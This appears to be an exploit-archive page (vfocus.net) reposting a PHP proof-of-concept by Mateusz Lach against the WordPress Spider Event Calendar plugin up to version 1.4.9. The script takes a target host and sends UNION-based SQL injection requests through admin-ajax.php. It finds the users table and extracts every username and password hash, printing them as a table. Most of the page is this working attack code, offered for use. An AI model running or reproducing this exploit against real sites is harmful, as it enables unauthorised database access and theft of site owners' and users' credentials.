首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress Webdorado Spider Event Calendar 1.4.9 - SQL Injection
来源:vfocus.net 作者:Lach 发布时间:2015-02-25  
<?php

/*

# Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9  [SQL Injection]
# Date: 2015-02-12
# Exploit Author: Mateusz Lach
# Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
# Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
# Version: 1.4.9
# Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
# CVE : CWE-89
# OWASP Top10: A1-Injection


This program is free software: you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation, either version 3 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program.  If not, see <http://www.gnu.org/licenses/>.

    # Exploit Title: WordPress: Webdorado Spider Event Calendar <= 1.4.9 [SQL Injection]
    # Date: 2015-02-12
    # Exploit Author: Mateusz Lach
    # Vendor Homepage: https://www.facebook.com/WebDorado or http://www.webdorado.com
    # Software Link: https://downloads.wordpress.org/plugin/spider-event-calendar.1.4.9.zip
    # Version: 1.4.9
    # Tested on: OpenSUSE Linux + Chrome and Firefox, it's PHP application.
    # CVE : CWE-89
    # OWASP Top10: A1-Injection
*/

define('FETCH_PREFIX_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,(SELECT%%20CONCAT(CHAR(35,35,35,35),table_name,CHAR(35,35,35,35))%%20FROM%%20information_schema.tables%%20WHERE%%20table_name%%20LIKE%%20(%%20SELECT%%20CHAR(37,%%20117,%%20115,%%20101,%%20114,%%20115)%%20)%%20LIMIT%%201),1,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20FROM%%20DUAL;--%%20--%%20&widget=0');

define('FETCH_USERS_URL', 'http://%s/wp-admin/admin-ajax.php?action=spiderbigcalendar_month&theme_id=13&calendar=1&select=month,list,week,day,&date=2015-02&many_sp_calendar=1&cur_page_url=%s&cat_id=1)%%20UNION%%20SELECT%%20%s,1,%%20FROM_UNIXTIME(1423004400),1,%%20CONCAT(CHAR(35,33,35,33,35,33,35),GROUP_CONCAT(%%20CONCAT(%%20CONCAT(user_login,CHAR(35,%%2035),user_pass))),CHAR(35,33,35,33,35,33,35)),%%201,1,1,1,%%20CHAR(110,%%20111,%%2095,%%20114,%%20101,%%20112,%%20101,%%2097,%%20116),1,1,1,1,1,1,1,1,1%%20as%%20fakeGroup%%20FROM%%20%s%%20GROUP%%20BY%%20fakeGroup;--%%20&widget=0');

define('FAKE_ID_TO_SEARCH', 12345677654321);
define('PATTERN_TO_SEARCH', 'ev_ids='.FAKE_ID_TO_SEARCH);
define('PATTERN_TO_SEARCH_USERS', '#!#!#!#');
define('ROW_SEPARATOR', ',');
define('FIELD_SEPARATOR', '##');
$server = $_GET['SRV'];
if (empty($server))
{
    echo 'Please put server (without protocol) name in SRV GET variable!';
}
else
{
    $fullURL = sprintf(FETCH_PREFIX_URL, $server, $server, FAKE_ID_TO_SEARCH);
    $prefixCurl = curl_init($fullURL);
    curl_setopt($prefixCurl, CURLOPT_RETURNTRANSFER, true);
    $result = curl_exec($prefixCurl);
    if (stripos($result, PATTERN_TO_SEARCH) !== false)
    {
        preg_match('/####[a-zA-Z\_0-9]*####/', $result, $tableNames);
        $tableName = str_replace('####', '', $tableNames[0]);
        echo 'tableName: '.$tableName.'<BR/>';
        $fullURL = sprintf(FETCH_USERS_URL, $server, $server, FAKE_ID_TO_SEARCH, $tableName);
        $usersCurl = curl_init($fullURL);
        curl_setopt($usersCurl, CURLOPT_RETURNTRANSFER, true);
        $result = curl_exec($usersCurl); 
        if (stripos($result, PATTERN_TO_SEARCH) !== false)
        {
            $from = stripos($result, PATTERN_TO_SEARCH_USERS);
            $to = stripos($result, PATTERN_TO_SEARCH_USERS, $from + strlen(PATTERN_TO_SEARCH_USERS));
            $result = substr($result, $from, $to-$from);
            echo '<table><tr><td>'.str_replace(FIELD_SEPARATOR, '</td><td>', str_replace(ROW_SEPARATOR, '</td></tr><tr><td>', str_replace(PATTERN_TO_SEARCH_USERS, '', $result))).'</td></tr></table>';
        }
        else
        {
            echo 'Table name fetched, but not users - try to rewrite exploit :-(';
        }
    }
    else
    {
        echo 'NOT vulnerable :-(';
    }
}
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·PHP DateTime Use After Free Vu
·Realtek 11n Wireless LAN utili
·SEANux 1.0 Remote Command Exec
·PCMan FTP Server 2.0.7 - Buffe
·SoftSphere DefenseWall FW/IPS
·HP Client Automation Command I
·Achat 0.150 beta7 Buffer Overf
·Javascript Injection For Eval-
·Tiny Server 1.1.9 - Arbitrary
·PHP DateTimeZone Type Confusio
·LG DVR LE6016D - Unauthenticat
·Samsung iPolis Buffer Overflow
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved